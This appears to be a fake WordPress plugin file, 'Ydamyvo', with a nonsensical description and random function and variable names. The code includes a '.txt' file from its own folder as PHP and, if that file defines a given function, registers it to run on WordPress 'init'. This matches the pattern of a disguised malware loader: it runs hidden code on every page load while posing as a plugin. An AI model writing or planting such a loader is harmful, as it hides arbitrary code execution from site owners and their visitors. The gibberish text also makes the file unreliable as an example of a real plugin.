<?php

/**
 * Plugin Name: Ydamyvo
 * Plugin URI: https://obses862.org/ydamyvo
 * Description: Border length submerged weight.
 * Version: 1.15.2
 * Author: Elvis Enrique
 * Author URI: https://obses862.org
 * Text Domain: ydamyvo
 * License: GPL2+
 *
 */

function dotigo_zebezu() {
    bewufe_ovyhaz();
}

$ezhozir = __DIR__ . '/anahoqe.txt';
if (file_exists($ezhozir)) {
    include($ezhozir);
}

if (function_exists("bewufe_ovyhaz")) {
    $surulo = new zynusa_ewolog();
    if ($surulo->saruri_mukaso()) {
        add_action('init', 'dotigo_zebezu');
    }
}